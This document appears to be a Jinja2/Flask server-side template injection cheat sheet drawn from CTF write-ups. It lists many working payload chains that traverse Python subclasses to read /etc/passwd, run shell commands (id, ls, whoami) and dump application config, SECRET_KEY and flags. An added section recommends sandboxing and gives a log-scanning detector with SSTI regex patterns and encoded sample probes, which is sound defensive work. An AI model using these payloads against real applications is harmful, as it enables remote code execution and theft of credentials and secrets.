Unless stated otherwise, everything below was tested in a Python 3.7.7 environment.
{{''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__['__builtins__']['open']('test.txt').read()}}
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == '_ModuleLock' %}
{% for b in c.__init__.__globals__ %}
{%if b =='__builtins__' %}
{% print(c.__init__.__globals__['__builtins__']['open']('test.txt').read()) %}
{%endif%}
{% endfor %}
{% endif %}
{% endfor %}
The ''.__class__.__mro__[1].__subclasses__()[75] in the payload above is equal to
{{ ''.__class__.__mro__[1].__subclasses__()[345]('test.txt').read()}}
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}
{{{}.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__['open']('/etc/passwd').read()}}
{{ ''.__class__.__mro__[1].__subclasses__()[183].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()") }}
Under ''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__.__builtins__ there are global functions such as eval and __import__, which can be used to execute commands:
#eval
''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")
''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()")
#__import__
''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__.__builtins__.__import__('os').popen('id').read()
''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
().__class__.__bases__[0].__subclasses__()[-4].__init__.__globals__['system']('ls')
().__class__.__bases__[0].__subclasses__()[93].__init__.__globals__["sys"].modules["os"].system("ls")
''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__["sys"].modules["os"].system("ls")
[].__class__.__base__.__subclasses__()[127].__init__.__globals__['system']('ls')
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['linecache'].__dict__['os'].popen('whoami').read()}}
{{config.items()}}
This contains all of the application's configuration values. In most cases that includes sensitive values such as database connection strings, credentials for third-party services, the SECRET_KEY, and so on.
For example, the globals available inside templates include:
url_for, g, request, namespace, lipsum, range, session, dict, get_flashed_messages, cycler, joiner, config, etc.
If config and self cannot be used, configuration data has to be reached from the global variables above them (e.g. reaching current_app from a global's __globals__ and reading its config):
{{url_for.__globals__['current_app'].config.FLAG}}
{{get_flashed_messages.__globals__['current_app'].config.FLAG}}
{{request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__globals__['current_app'].config['FLAG']}}
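Every chain listed on this page, from the __class__/__mro__/__subclasses__ traversal down to the config and current_app probes, reuses a small set of fixed tokens, which makes the traffic easy to spot on the defender's side. The structural fix is not to build the template source from user input at all (pass the value as template context, or render through a jinja2.sandbox.SandboxedEnvironment, which refuses attribute names starting with an underscore); the example below covers the detection side. It is an added example, not code from the original post: a stdlib-only scanner that URL-decodes access-log query strings and flags the indicator combinations used by the payloads above. The log lines, IPs and parameter names are constructed sample data.

```python
"""Added example (not from the original post): flag access-log requests whose
query parameters carry the Jinja2/Flask SSTI probe patterns catalogued above.
Log lines and parameter names are constructed sample data."""
import re
from urllib.parse import unquote_plus

# Indicators taken from the payloads above: dunder traversal, builtins access,
# Flask globals used to reach current_app.config, and command-execution sinks.
DUNDER_CHAIN = re.compile(
    r"__(class|mro|base|bases|subclasses|init|globals|builtins|import|dict)__"
)
TEMPLATE_SYNTAX = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
CONFIG_PROBE = re.compile(r"\b(config|current_app)\b")
CODE_EXEC = re.compile(r"\b(eval|__import__|popen|system|subprocess)\b")


def score_ssti(raw_value: str) -> dict:
    """Return indicator hits for one request parameter value.

    The value is URL-decoded twice because probes are often double-encoded to
    survive a single decoding layer in a proxy or WAF.
    """
    decoded = unquote_plus(unquote_plus(raw_value))
    hits = {
        "template_syntax": bool(TEMPLATE_SYNTAX.search(decoded)),
        "dunder_chain": len(DUNDER_CHAIN.findall(decoded)),
        "config_probe": bool(CONFIG_PROBE.search(decoded)),
        "code_exec": bool(CODE_EXEC.search(decoded)),
    }
    # Template delimiters plus any other indicator is a confident hit. A long
    # dunder chain without delimiters is also surfaced, because the expression
    # may be evaluated by a sink that supplies the braces itself, and a single
    # stray "__class__" in ordinary text stays below the threshold.
    hits["suspicious"] = bool(
        (hits["template_syntax"]
         and (hits["dunder_chain"] > 0 or hits["config_probe"] or hits["code_exec"]))
        or hits["dunder_chain"] >= 3
    )
    return hits


# Common/combined log format: client IP, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) .*"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Return (ip, path, hits) for every log line whose query string scores as an SSTI probe."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or "?" not in m.group("path"):
            continue
        path = m.group("path")
        query = path.split("?", 1)[1]
        for pair in query.split("&"):
            value = pair.split("=", 1)[1] if "=" in pair else pair
            hits = score_ssti(value)
            if hits["suspicious"]:
                findings.append((m.group("ip"), path, hits))
                break  # one finding per request is enough for triage
    return findings


# Constructed sample log lines (not real traffic): one benign request, three
# probes mirroring the payload shapes on this page, one benign false-positive
# candidate containing a lone "__class__".
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2020:10:00:01 +0000] "GET /hello?name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Mar/2020:10:00:02 +0000] "GET /hello?name=%7B%7Bconfig.items()%7D%7D HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Mar/2020:10:00:03 +0000] "GET /hello?name=%7B%7B%27%27.__class__.__mro__%5B1%5D.__subclasses__()%5B75%5D.__init__.__globals__%5B%27__builtins__%27%5D%5B%27eval%27%5D HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Mar/2020:10:00:04 +0000] "GET /hello?name=%257B%257Burl_for.__globals__%255B%2527current_app%2527%255D.config%257D%257D HTTP/1.1" 200 300',
    '10.0.0.7 - - [01/Mar/2020:10:00:05 +0000] "GET /docs?q=python__class__attribute HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, path, hits in scan_access_log(SAMPLE_LOG):
        print(ip, path, hits)
```

The thresholds are deliberately conservative: a single "__class__" in a documentation search is not reported, while the double-encoded current_app probe is, because both decoding passes are applied before matching. Feed the same regexes to a WAF or SIEM rule and review the 5xx responses first, since a traversal chain that hits a wrong subclass index typically crashes the render.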
http://15h3na0.xyz/2020/02/24/ICQ%20GYCTF2020/#Day3-Flaskapp
https://www.cnblogs.com/MisakaYuii-Z/p/12407760.html
writeup: https://medium.com/hmif-itb/rootersctf-2019-writeup-d500434c85fe#90d9
https://github.com/vulhub/vulhub/tree/master/flask/ssti
https://www.cnblogs.com/20175211lyz/p/11425368.html
https://0day.work/jinja2-template-injection-filter-bypasses/
https://bbs.ichunqiu.com/thread-47685-1-1.html?from=aqzx8
https://xz.aliyun.com/t/3679#toc-6
https://medium.com/@nyomanpradipta120/jinja2-ssti-filter-bypasses-a8d3eb7b000f
https://www.smi1e.top/flask-jinja2-ssti-%E5%AD%A6%E4%B9%A0/
https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee